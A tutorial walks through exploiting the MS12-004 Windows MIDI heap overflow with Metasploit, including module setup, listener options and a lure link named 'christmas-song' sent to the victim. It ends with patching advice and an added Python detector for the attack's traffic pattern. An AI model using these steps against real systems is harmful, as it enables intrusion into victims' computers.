Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Vulnerable Application : Windows Multimedia Library (winmm.dll)
Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the calculated offset to be higher than what is available on the heap (0x400 allocated by WINMM!winmmAlloc), which then allows us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we set up and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution in the context of the user.
At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).
Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
1. Metasploit Framework (Windows/Linux)
2. ms12_004_midi.rb exploit (download link)
Attacker IP Address : 192.168.1.7
Victim IP Address : 192.168.1.6
1. Download the exploit above, then copy it to the destination folder using the following command:
cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Start the Metasploit Framework with the msfconsole command, then use the exploit you added in step 1.
3. Next, you can view the available options by running the show options command. The example below sets only the options that matter for the exploit to run without problems.
set srvhost 192.168.1.7 --> attacker server host (attacker IP address)
set srvport 80 --> local port opened to receive the connection from the victim
set uripath christmas-song --> social engineering link
set lhost 192.168.1.7 --> lhost IP address that receives the payload
set lport 443 --> local port that receives the payload connection from the victim
exploit --> run the exploit
http://192.168.1.7/christmas-song --> link to send to the victim
4. When the victim opens the malicious link, our Backtrack console shows an active session and we can get into their computer 🙂
1. Always keep Windows updated. If you're using Windows XP, you can migrate to Windows 7.
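Besides patching, defenders can hunt for the traffic pattern the steps above leave behind: an IE browser on Windows XP requesting a page from a bare IP address, followed shortly by a connection from the same client back to that IP on a second port. The script below is an added example, not part of the original tutorial or of the Metasploit module; the log format, the function names and the 60-second window are assumptions, and the sample log lines are constructed.

```python
import ipaddress
from datetime import datetime

# Constructed sample events (not real logs):
# time, client, server, destination port, user agent ("-" for a non-HTTP connection)
SAMPLE_LOG = """\
2012-02-01T10:00:00 192.168.1.6 192.168.1.7 80 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
2012-02-01T10:00:09 192.168.1.6 192.168.1.7 443 -
2012-02-01T10:01:00 192.168.1.9 intranet.example 80 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
2012-02-01T10:01:05 192.168.1.9 intranet.example 443 -
2012-02-01T10:02:00 192.168.1.12 192.168.1.7 80 Mozilla/5.0 (Windows NT 6.1; rv:10.0) Firefox/10.0
2012-02-01T10:02:04 192.168.1.12 192.168.1.7 8080 -
2012-02-01T10:30:00 192.168.1.6 192.168.1.7 443 -
"""

def is_ip_literal(host):
    """True when the server was addressed by IP rather than by name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def parse(log):
    for line in log.splitlines():
        ts, client, server, port, agent = line.split(" ", 4)
        yield datetime.fromisoformat(ts), client, server, int(port), agent

def find_delivery_then_callback(log, window_s=60):
    """Flag an IE-on-XP client that browses to a bare-IP web server and then
    connects to the same IP on a different port within window_s seconds."""
    visits = {}  # (client, server) -> (time, port) of the last matching HTTP request
    hits = []
    for ts, client, server, port, agent in parse(log):
        key = (client, server)
        if "MSIE" in agent and "Windows NT 5.1" in agent and is_ip_literal(server):
            visits[key] = (ts, port)
        elif agent == "-" and key in visits:
            seen, http_port = visits[key]
            if port != http_port and (ts - seen).total_seconds() <= window_s:
                hits.append((client, server, http_port, port))
                del visits[key]  # report each delivery once
    return hits

if __name__ == "__main__":
    for hit in find_delivery_then_callback(SAMPLE_LOG):
        print("suspicious: %s -> %s (page on port %d, follow-up on port %d)" % hit)
```

A hit is a lead for triage, not proof of compromise; confirm it against the host's patch level and process activity.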
Hope you enjoyed 🙂